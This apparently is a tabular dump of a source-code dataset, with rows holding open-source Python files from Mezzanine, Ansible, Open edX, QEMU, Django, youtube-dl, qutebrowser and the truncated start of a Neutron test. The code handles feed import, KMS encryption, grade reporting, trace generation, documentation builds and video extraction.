repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
eino-makitalo/mezzanine
|
mezzanine/blog/management/commands/import_rss.py
|
34
|
2878
|
from __future__ import unicode_literals
from datetime import timedelta
from optparse import make_option
from time import timezone
try:
from urllib.request import urlopen
from urllib.parse import urljoin
except ImportError:
from urllib import urlopen
from urlparse import urljoin
from django.core.management.base import CommandError
from mezzanine.blog.management.base import BaseImporterCommand
class Command(BaseImporterCommand):
"""
Import an RSS feed into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-r", "--rss-url", dest="rss_url",
help="RSS feed URL"),
make_option("-p", "--page-url", dest="page_url",
help="URL for a web page containing the RSS link"),
)
help = ("Import an RSS feed into the blog app. Requires the "
"dateutil and feedparser packages installed, and also "
"BeautifulSoup if using the --page-url option.")
def handle_import(self, options):
rss_url = options.get("rss_url")
page_url = options.get("page_url")
if not (page_url or rss_url):
raise CommandError("Either --rss-url or --page-url option "
"must be specified")
try:
from dateutil import parser
except ImportError:
raise CommandError("dateutil package is required")
try:
from feedparser import parse
except ImportError:
raise CommandError("feedparser package is required")
if not rss_url and page_url:
if "://" not in page_url:
page_url = "http://%s" % page_url
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
raise CommandError("BeautifulSoup package is required")
for l in BeautifulSoup(urlopen(page_url).read()).findAll("link"):
if ("application/rss" in l.get("type", "") or
"application/atom" in l.get("type", "")):
rss_url = urljoin(page_url, l["href"])
break
else:
raise CommandError("Could not parse RSS link from the page")
posts = parse(rss_url)["entries"]
for post in posts:
if hasattr(post, 'content'):
content = post.content[0]["value"]
else:
content = post.summary
tags = [tag["term"] for tag in getattr(post, 'tags', [])]
try:
pub_date = parser.parse(getattr(post, "published",
post.updated)) - timedelta(seconds=timezone)
except AttributeError:
pub_date = None
self.add_post(title=post.title, content=content,
pub_date=pub_date, tags=tags, old_url=None)
|
bsd-2-clause
|
Lujeni/ansible
|
lib/ansible/plugins/filter/gcp_kms_filters.py
|
21
|
3679
|
# (c) 2019, Eric Anderson <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Usage:
# vars:
# encrypted_myvar: "{{ var | b64encode | gcp_kms_encrypt(auth_kind='serviceaccount',
# service_account_file='gcp_service_account_file', projects='default',
# key_ring='key_ring', crypto_key='crypto_key') }}"
# decrypted_myvar: "{{ encrypted_myvar | gcp_kms_decrypt(auth_kind='serviceaccount',
# service_account_file=gcp_service_account_file, projects='default',
# key_ring='key_ring', crypto_key='crypto_key') }}"
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.module_utils.gcp_utils import GcpSession
class GcpMockModule(object):
def __init__(self, params):
self.params = params
def fail_json(self, *args, **kwargs):
raise AnsibleError(kwargs['msg'])
class GcpKmsFilter():
def run(self, method, **kwargs):
params = {
'ciphertext': kwargs.get('ciphertext', None),
'plaintext': kwargs.get('plaintext', None),
'additional_authenticated_data': kwargs.get('additional_authenticated_data', None),
'key_ring': kwargs.get('key_ring', None),
'crypto_key': kwargs.get('crypto_key', None),
'projects': kwargs.get('projects', None),
'scopes': kwargs.get('scopes', None),
'locations': kwargs.get('locations', 'global'),
'auth_kind': kwargs.get('auth_kind', None),
'service_account_file': kwargs.get('service_account_file', None),
'service_account_email': kwargs.get('service_account_email', None),
}
if not params['scopes']:
params['scopes'] = ['https://www.googleapis.com/auth/cloudkms']
fake_module = GcpMockModule(params)
if method == "encrypt":
return self.kms_encrypt(fake_module)
elif method == "decrypt":
return self.kms_decrypt(fake_module)
def kms_decrypt(self, module):
payload = {"ciphertext": module.params['ciphertext']}
if module.params['additional_authenticated_data']:
payload['additionalAuthenticatedData'] = module.params['additional_authenticated_data']
auth = GcpSession(module, 'cloudkms')
url = "https://cloudkms.googleapis.com/v1/projects/{projects}/locations/{locations}/" \
"keyRings/{key_ring}/cryptoKeys/{crypto_key}:decrypt".format(**module.params)
response = auth.post(url, body=payload)
return response.json()['plaintext']
def kms_encrypt(self, module):
payload = {"plaintext": module.params['plaintext']}
if module.params['additional_authenticated_data']:
payload['additionalAuthenticatedData'] = module.params['additional_authenticated_data']
auth = GcpSession(module, 'cloudkms')
url = "https://cloudkms.googleapis.com/v1/projects/{projects}/locations/{locations}/" \
"keyRings/{key_ring}/cryptoKeys/{crypto_key}:encrypt".format(**module.params)
response = auth.post(url, body=payload)
return response.json()['ciphertext']
def gcp_kms_encrypt(plaintext, **kwargs):
return GcpKmsFilter().run('encrypt', plaintext=plaintext, **kwargs)
def gcp_kms_decrypt(ciphertext, **kwargs):
return GcpKmsFilter().run('decrypt', ciphertext=ciphertext, **kwargs)
class FilterModule(object):
def filters(self):
return {
'gcp_kms_encrypt': gcp_kms_encrypt,
'gcp_kms_decrypt': gcp_kms_decrypt
}
|
gpl-3.0
|
ESOedX/edx-platform
|
openedx/core/djangoapps/credentials/signals.py
|
1
|
6507
|
"""
This file contains signal handlers for credentials-related functionality.
"""
from __future__ import absolute_import
from logging import getLogger
from django.contrib.sites.models import Site
from course_modes.models import CourseMode
from lms.djangoapps.certificates.models import CertificateStatuses, GeneratedCertificate
from lms.djangoapps.grades.api import CourseGradeFactory
from openedx.core.djangoapps.catalog.utils import get_programs
from openedx.core.djangoapps.credentials.models import CredentialsApiConfig
from openedx.core.djangoapps.site_configuration import helpers
from .tasks.v1.tasks import send_grade_to_credentials
log = getLogger(__name__)
# "interesting" here means "credentials will want to know about it"
INTERESTING_MODES = CourseMode.CERTIFICATE_RELEVANT_MODES
INTERESTING_STATUSES = [
CertificateStatuses.notpassing,
CertificateStatuses.downloadable,
]
# These handlers have Credentials business logic that has bled into the LMS. But we want to filter here in order to
# not flood our task queue with a bunch of signals. So we put up with it.
def is_course_run_in_a_program(course_run_key):
""" Returns true if the given course key is in any program at all. """
# We don't have an easy way to go from course_run_key to a specific site that owns it. So just search each site.
sites = Site.objects.all()
str_key = str(course_run_key)
for site in sites:
for program in get_programs(site):
for course in program['courses']:
for course_run in course['course_runs']:
if str_key == course_run['key']:
return True
return False
def send_grade_if_interesting(user, course_run_key, mode, status, letter_grade, percent_grade, verbose=False):
""" Checks if grade is interesting to Credentials and schedules a Celery task if so. """
if verbose:
msg = u"Starting send_grade_if_interesting with params: "\
u"user [{username}], "\
u"course_run_key [{key}], "\
u"mode [{mode}], "\
u"status [{status}], "\
u"letter_grade [{letter_grade}], "\
u"percent_grade [{percent_grade}], "\
u"verbose [{verbose}]"\
.format(
username=getattr(user, 'username', None),
key=str(course_run_key),
mode=mode,
status=status,
letter_grade=letter_grade,
percent_grade=percent_grade,
verbose=verbose
)
log.info(msg)
# Avoid scheduling new tasks if certification is disabled. (Grades are a part of the records/cert story)
if not CredentialsApiConfig.current().is_learner_issuance_enabled:
if verbose:
log.info("Skipping send grade: is_learner_issuance_enabled False")
return
# Avoid scheduling new tasks if learner records are disabled for this site.
if not helpers.get_value_for_org(course_run_key.org, 'ENABLE_LEARNER_RECORDS', True):
if verbose:
log.info(
u"Skipping send grade: ENABLE_LEARNER_RECORDS False for org [{org}]".format(
org=course_run_key.org
)
)
return
# Grab mode/status if we don't have them in hand
if mode is None or status is None:
try:
cert = GeneratedCertificate.objects.get(user=user, course_id=course_run_key) # pylint: disable=no-member
mode = cert.mode
status = cert.status
except GeneratedCertificate.DoesNotExist:
# We only care about grades for which there is a certificate.
if verbose:
log.info(
u"Skipping send grade: no cert for user [{username}] & course_id [{course_id}]".format(
username=getattr(user, 'username', None),
course_id=str(course_run_key)
)
)
return
# Don't worry about whether it's available as well as awarded. Just awarded is good enough to record a verified
# attempt at a course. We want even the grades that didn't pass the class because Credentials wants to know about
# those too.
if mode not in INTERESTING_MODES or status not in INTERESTING_STATUSES:
if verbose:
log.info(
u"Skipping send grade: mode/status uninteresting for mode [{mode}] & status [{status}]".format(
mode=mode,
status=status
)
)
return
# If the course isn't in any program, don't bother telling Credentials about it. When Credentials grows support
# for course records as well as program records, we'll need to open this up.
if not is_course_run_in_a_program(course_run_key):
if verbose:
log.info(
u"Skipping send grade: course run not in a program. [{course_id}]".format(course_id=str(course_run_key))
)
return
# Grab grades if we don't have them in hand
if letter_grade is None or percent_grade is None:
grade = CourseGradeFactory().read(user, course_key=course_run_key, create_if_needed=False)
if grade is None:
if verbose:
log.info(
u"Skipping send grade: No grade found for user [{username}] & course_id [{course_id}]".format(
username=getattr(user, 'username', None),
course_id=str(course_run_key)
)
)
return
letter_grade = grade.letter_grade
percent_grade = grade.percent
send_grade_to_credentials.delay(user.username, str(course_run_key), True, letter_grade, percent_grade)
def handle_grade_change(user, course_grade, course_key, **kwargs):
"""
Notifies the Credentials IDA about certain grades it needs for its records, when a grade changes.
"""
send_grade_if_interesting(
user,
course_key,
None,
None,
course_grade.letter_grade,
course_grade.percent,
verbose=kwargs.get('verbose', False)
)
def handle_cert_change(user, course_key, mode, status, **kwargs):
"""
Notifies the Credentials IDA about certain grades it needs for its records, when a cert changes.
"""
send_grade_if_interesting(user, course_key, mode, status, None, None, verbose=kwargs.get('verbose', False))
|
agpl-3.0
|
krasin/qemu-counter
|
scripts/tracetool/backend/ftrace.py
|
92
|
1500
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Ftrace built-in backend.
"""
__author__ = "Eiichi Tsukata <[email protected]>"
__copyright__ = "Copyright (C) 2013 Hitachi, Ltd."
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "[email protected]"
from tracetool import out
PUBLIC = True
def c(events):
pass
def h(events):
out('#include "trace/ftrace.h"',
'#include "trace/control.h"',
'',
)
for e in events:
argnames = ", ".join(e.args.names())
if len(e.args) > 0:
argnames = ", " + argnames
out('static inline void trace_%(name)s(%(args)s)',
'{',
' char ftrace_buf[MAX_TRACE_STRLEN];',
' int unused __attribute__ ((unused));',
' int trlen;',
' bool _state = trace_event_get_state(%(event_id)s);',
' if (_state) {',
' trlen = snprintf(ftrace_buf, MAX_TRACE_STRLEN,',
' "%(name)s " %(fmt)s "\\n" %(argnames)s);',
' trlen = MIN(trlen, MAX_TRACE_STRLEN - 1);',
' unused = write(trace_marker_fd, ftrace_buf, trlen);',
' }',
'}',
name = e.name,
args = e.args,
event_id = "TRACE_" + e.name.upper(),
fmt = e.fmt.rstrip("\n"),
argnames = argnames,
)
|
gpl-2.0
|
dfunckt/django
|
docs/conf.py
|
3
|
12624
|
# -*- coding: utf-8 -*-
#
# Django documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 27 09:06:53 2008.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't picklable (module imports are okay, they're removed automatically).
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import unicode_literals
import sys
from os.path import abspath, dirname, join
# Workaround for sphinx-build recursion limit overflow:
# pickle.dump(doctree, f, pickle.HIGHEST_PROTOCOL)
# RuntimeError: maximum recursion depth exceeded while pickling an object
#
# Python's default allowed recursion depth is 1000 but this isn't enough for
# building docs/ref/settings.txt sometimes.
# https://groups.google.com/d/topic/sphinx-dev/MtRf64eGtv4/discussion
sys.setrecursionlimit(2000)
# Make sure we get the version of this copy of Django
sys.path.insert(1, dirname(dirname(abspath(__file__))))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(abspath(join(dirname(__file__), "_ext")))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.3' # Actually 1.3.4, but micro versions aren't supported here.
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
"djangodocs",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
"ticket_role",
"cve_role",
]
# Spelling check needs an additional module that is not installed by default.
# Add it only if spelling check is requested so docs can be generated without it.
if 'spelling' in sys.argv:
extensions.append("sphinxcontrib.spelling")
# Spelling language.
spelling_lang = 'en_US'
# Location of word list.
spelling_word_list_filename = 'spelling_wordlist'
# Add any paths that contain templates here, relative to this directory.
# templates_path = []
# The suffix of source filenames.
source_suffix = '.txt'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'contents'
# General substitutions.
project = 'Django'
copyright = 'Django Software Foundation and contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.11'
# The full version, including alpha/beta/rc tags.
try:
from django import VERSION, get_version
except ImportError:
release = version
else:
def django_release():
pep440ver = get_version()
if VERSION[3:5] == ('alpha', 0) and 'dev' not in pep440ver:
return pep440ver + '.dev'
return pep440ver
release = django_release()
# The "development version" of Django
django_next_version = '1.11'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# Location for .po/.mo translation files used when language is set
locale_dirs = ['locale/']
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'trac'
# Links to Python's docs should reference the most recent version of the 3.x
# branch, which is located at this URL.
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
'sphinx': ('http://sphinx-doc.org/', None),
'six': ('https://pythonhosted.org/six/', None),
'formtools': ('https://django-formtools.readthedocs.io/en/latest/', None),
'psycopg2': ('http://initd.org/psycopg/docs/', None),
}
# Python's docs don't change every week.
intersphinx_cache_limit = 90 # days
# The 'versionadded' and 'versionchanged' directives are overridden.
suppress_warnings = ['app.add_directive']
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "djangodocs"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ["_theme"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
html_use_smartypants = True
# Content template for the index page.
# html_index = ''
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Djangodoc'
modindex_common_prefix = ["django."]
# Appended to every page
rst_epilog = """
.. |django-users| replace:: :ref:`django-users <django-users-mailing-list>`
.. |django-core-mentorship| replace:: :ref:`django-core-mentorship <django-core-mentorship-mailing-list>`
.. |django-developers| replace:: :ref:`django-developers <django-developers-mailing-list>`
.. |django-announce| replace:: :ref:`django-announce <django-announce-mailing-list>`
.. |django-updates| replace:: :ref:`django-updates <django-updates-mailing-list>`
"""
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
'preamble': (
'\\DeclareUnicodeCharacter{2264}{\\ensuremath{\\le}}'
'\\DeclareUnicodeCharacter{2265}{\\ensuremath{\\ge}}'
'\\DeclareUnicodeCharacter{2665}{[unicode-heart]}'
'\\DeclareUnicodeCharacter{2713}{[unicode-checkmark]}'
),
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class [howto/manual]).
# latex_documents = []
latex_documents = [
('contents', 'django.tex', 'Django Documentation',
'Django Software Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(
'ref/django-admin',
'django-admin',
'Utility script for the Django Web framework',
['Django Software Foundation'],
1
), ]
# -- Options for Texinfo output ------------------------------------------------
# List of tuples (startdocname, targetname, title, author, dir_entry,
# description, category, toctree_only)
texinfo_documents = [(
master_doc, "django", "", "", "Django",
"Documentation of the Django framework", "Web development", False
)]
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = 'Django Software Foundation'
epub_publisher = 'Django Software Foundation'
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
# epub_basename = 'Django'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
epub_theme = 'djangodocs-epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
# epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
# epub_scheme = ''
# The unique identifier of the text. This can be an ISBN number
# or the project homepage.
# epub_identifier = ''
# A unique identification for the text.
# epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
epub_cover = ('', 'epub-cover.html')
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
# epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
# epub_post_files = []
# A list of files that should not be packed into the epub file.
# epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
# epub_tocdepth = 3
# Allow duplicate toc entries.
# epub_tocdup = True
# Choose between 'default' and 'includehidden'.
# epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
# epub_fix_images = False
# Scale large images.
# epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# epub_show_urls = 'inline'
# If false, no index is generated.
# epub_use_index = True
# -- custom extension options --------------------------------------------------
cve_url = 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=%s'
ticket_url = 'https://code.djangoproject.com/ticket/%s'
|
bsd-3-clause
|
vjmac15/Lyilis
|
lib/youtube_dl/extractor/giantbomb (VJ Washington's conflicted copy 2017-08-29).py
|
30
|
2928
|
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..utils import (
determine_ext,
int_or_none,
qualities,
unescapeHTML,
)
class GiantBombIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?giantbomb\.com/videos/(?P<display_id>[^/]+)/(?P<id>\d+-\d+)'
_TEST = {
'url': 'http://www.giantbomb.com/videos/quick-look-destiny-the-dark-below/2300-9782/',
'md5': 'c8ea694254a59246a42831155dec57ac',
'info_dict': {
'id': '2300-9782',
'display_id': 'quick-look-destiny-the-dark-below',
'ext': 'mp4',
'title': 'Quick Look: Destiny: The Dark Below',
'description': 'md5:0aa3aaf2772a41b91d44c63f30dfad24',
'duration': 2399,
'thumbnail': r're:^https?://.*\.jpg$',
}
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
display_id = mobj.group('display_id')
webpage = self._download_webpage(url, display_id)
title = self._og_search_title(webpage)
description = self._og_search_description(webpage)
thumbnail = self._og_search_thumbnail(webpage)
video = json.loads(unescapeHTML(self._search_regex(
r'data-video="([^"]+)"', webpage, 'data-video')))
duration = int_or_none(video.get('lengthSeconds'))
quality = qualities([
'f4m_low', 'progressive_low', 'f4m_high',
'progressive_high', 'f4m_hd', 'progressive_hd'])
formats = []
for format_id, video_url in video['videoStreams'].items():
if format_id == 'f4m_stream':
continue
ext = determine_ext(video_url)
if ext == 'f4m':
f4m_formats = self._extract_f4m_formats(video_url + '?hdcore=3.3.1', display_id)
if f4m_formats:
f4m_formats[0]['quality'] = quality(format_id)
formats.extend(f4m_formats)
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
video_url, display_id, ext='mp4', entry_protocol='m3u8_native',
m3u8_id='hls', fatal=False))
else:
formats.append({
'url': video_url,
'format_id': format_id,
'quality': quality(format_id),
})
if not formats:
youtube_id = video.get('youtubeID')
if youtube_id:
return self.url_result(youtube_id, 'Youtube')
self._sort_formats(formats)
return {
'id': video_id,
'display_id': display_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'formats': formats,
}
|
gpl-3.0
|
lahwaacz/qutebrowser
|
scripts/asciidoc2html.py
|
1
|
10901
|
#!/usr/bin/env python3
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2017 Florian Bruhin (The Compiler) <[email protected]>
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Generate the html documentation based on the asciidoc files."""
import re
import os
import os.path
import sys
import subprocess
import glob
import shutil
import tempfile
import argparse
import io
sys.path.insert(0, os.path.join(os.path.dirname(__file__), os.pardir))
from scripts import utils
class AsciiDoc:
"""Abstraction of an asciidoc subprocess."""
FILES = [
('FAQ.asciidoc', 'qutebrowser/html/doc/FAQ.html'),
('CHANGELOG.asciidoc', 'qutebrowser/html/doc/CHANGELOG.html'),
('CONTRIBUTING.asciidoc', 'qutebrowser/html/doc/CONTRIBUTING.html'),
('doc/quickstart.asciidoc', 'qutebrowser/html/doc/quickstart.html'),
('doc/userscripts.asciidoc', 'qutebrowser/html/doc/userscripts.html'),
]
def __init__(self, args):
self._cmd = None
self._args = args
self._homedir = None
self._themedir = None
self._tempdir = None
self._failed = False
def prepare(self):
"""Get the asciidoc command and create the homedir to use."""
self._cmd = self._get_asciidoc_cmd()
self._homedir = tempfile.mkdtemp()
self._themedir = os.path.join(
self._homedir, '.asciidoc', 'themes', 'qute')
self._tempdir = os.path.join(self._homedir, 'tmp')
os.makedirs(self._tempdir)
os.makedirs(self._themedir)
def cleanup(self):
"""Clean up the temporary home directory for asciidoc."""
if self._homedir is not None and not self._failed:
shutil.rmtree(self._homedir)
def build(self):
if self._args.website:
self._build_website()
else:
self._build_docs()
self._copy_images()
def _build_docs(self):
"""Render .asciidoc files to .html sites."""
files = self.FILES[:]
for src in glob.glob('doc/help/*.asciidoc'):
name, _ext = os.path.splitext(os.path.basename(src))
dst = 'qutebrowser/html/doc/{}.html'.format(name)
files.append((src, dst))
# patch image links to use local copy
replacements = [
("http://qutebrowser.org/img/cheatsheet-big.png",
"qute://help/img/cheatsheet-big.png"),
("http://qutebrowser.org/img/cheatsheet-small.png",
"qute://help/img/cheatsheet-small.png")
]
for src, dst in files:
src_basename = os.path.basename(src)
modified_src = os.path.join(self._tempdir, src_basename)
with open(modified_src, 'w', encoding='utf-8') as modified_f, \
open(src, 'r', encoding='utf-8') as f:
for line in f:
for orig, repl in replacements:
line = line.replace(orig, repl)
modified_f.write(line)
self.call(modified_src, dst)
def _copy_images(self):
"""Copy image files to qutebrowser/html/doc."""
print("Copying files...")
dst_path = os.path.join('qutebrowser', 'html', 'doc', 'img')
try:
os.mkdir(dst_path)
except FileExistsError:
pass
for filename in ['cheatsheet-big.png', 'cheatsheet-small.png']:
src = os.path.join('doc', 'img', filename)
dst = os.path.join(dst_path, filename)
shutil.copy(src, dst)
def _build_website_file(self, root, filename):
"""Build a single website file."""
# pylint: disable=too-many-locals,too-many-statements
src = os.path.join(root, filename)
src_basename = os.path.basename(src)
parts = [self._args.website[0]]
dirname = os.path.dirname(src)
if dirname:
parts.append(os.path.relpath(os.path.dirname(src)))
parts.append(
os.extsep.join((os.path.splitext(src_basename)[0],
'html')))
dst = os.path.join(*parts)
os.makedirs(os.path.dirname(dst), exist_ok=True)
modified_src = os.path.join(self._tempdir, src_basename)
shutil.copy('www/header.asciidoc', modified_src)
outfp = io.StringIO()
with open(modified_src, 'r', encoding='utf-8') as header_file:
header = header_file.read()
header += "\n\n"
with open(src, 'r', encoding='utf-8') as infp:
outfp.write("\n\n")
hidden = False
found_title = False
title = ""
last_line = ""
for line in infp:
if line.strip() == '// QUTE_WEB_HIDE':
assert not hidden
hidden = True
elif line.strip() == '// QUTE_WEB_HIDE_END':
assert hidden
hidden = False
elif line == "The Compiler <[email protected]>\n":
continue
elif re.match(r'^:\w+:.*', line):
# asciidoc field
continue
if not found_title:
if re.match(r'^=+$', line):
line = line.replace('=', '-')
found_title = True
title = last_line.rstrip('\n') + " | qutebrowser\n"
title += "=" * (len(title) - 1)
elif re.match(r'^= .+', line):
line = '==' + line[1:]
found_title = True
title = last_line.rstrip('\n') + " | qutebrowser\n"
title += "=" * (len(title) - 1)
if not hidden:
outfp.write(line.replace(".asciidoc[", ".html["))
last_line = line
current_lines = outfp.getvalue()
outfp.close()
with open(modified_src, 'w+', encoding='utf-8') as final_version:
final_version.write(title + "\n\n" + header + current_lines)
asciidoc_args = ['--theme=qute', '-a toc', '-a toc-placement=manual']
self.call(modified_src, dst, *asciidoc_args)
def _build_website(self):
"""Prepare and build the website."""
theme_file = os.path.abspath(os.path.join('www', 'qute.css'))
shutil.copy(theme_file, self._themedir)
outdir = self._args.website[0]
for root, _dirs, files in os.walk(os.getcwd()):
for filename in files:
basename, ext = os.path.splitext(filename)
if (ext != '.asciidoc' or
basename in ['header', 'OpenSans-License']):
continue
self._build_website_file(root, filename)
copy = {'icons': 'icons', 'doc/img': 'doc/img', 'www/media': 'media/'}
for src, dest in copy.items():
full_dest = os.path.join(outdir, dest)
try:
shutil.rmtree(full_dest)
except FileNotFoundError:
pass
shutil.copytree(src, full_dest)
for dst, link_name in [
('README.html', 'index.html'),
(os.path.join('doc', 'quickstart.html'), 'quickstart.html'),
]:
try:
os.symlink(dst, os.path.join(outdir, link_name))
except FileExistsError:
pass
def _get_asciidoc_cmd(self):
"""Try to find out what commandline to use to invoke asciidoc."""
if self._args.asciidoc is not None:
return self._args.asciidoc
try:
subprocess.call(['asciidoc'], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except OSError:
pass
else:
return ['asciidoc']
try:
subprocess.call(['asciidoc.py'], stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
except OSError:
pass
else:
return ['asciidoc.py']
raise FileNotFoundError
def call(self, src, dst, *args):
"""Call asciidoc for the given files.
Args:
src: The source .asciidoc file.
dst: The destination .html file, or None to auto-guess.
*args: Additional arguments passed to asciidoc.
"""
print("Calling asciidoc for {}...".format(os.path.basename(src)))
cmdline = self._cmd[:]
if dst is not None:
cmdline += ['--out-file', dst]
cmdline += args
cmdline.append(src)
try:
env = os.environ.copy()
env['HOME'] = self._homedir
subprocess.check_call(cmdline, env=env)
except (subprocess.CalledProcessError, OSError) as e:
self._failed = True
utils.print_col(str(e), 'red')
print("Keeping modified sources in {}.".format(self._homedir))
sys.exit(1)
def main(colors=False):
"""Generate html files for the online documentation."""
utils.change_cwd()
utils.use_color = colors
parser = argparse.ArgumentParser()
parser.add_argument('--website', help="Build website into a given "
"directory.", nargs=1)
parser.add_argument('--asciidoc', help="Full path to python and "
"asciidoc.py. If not given, it's searched in PATH.",
nargs=2, required=False,
metavar=('PYTHON', 'ASCIIDOC'))
parser.add_argument('--no-authors', help=argparse.SUPPRESS,
action='store_true')
args = parser.parse_args()
try:
os.mkdir('qutebrowser/html/doc')
except FileExistsError:
pass
asciidoc = AsciiDoc(args)
try:
asciidoc.prepare()
except FileNotFoundError:
utils.print_col("Could not find asciidoc! Please install it, or use "
"the --asciidoc argument to point this script to the "
"correct python/asciidoc.py location!", 'red')
sys.exit(1)
try:
asciidoc.build()
finally:
asciidoc.cleanup()
if __name__ == '__main__':
main(colors=True)
|
gpl-3.0
|
wenhuizhang/neutron
|
neutron/tests/unit/scheduler/test_l3_agent_scheduler.py
|
2
|
75328
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
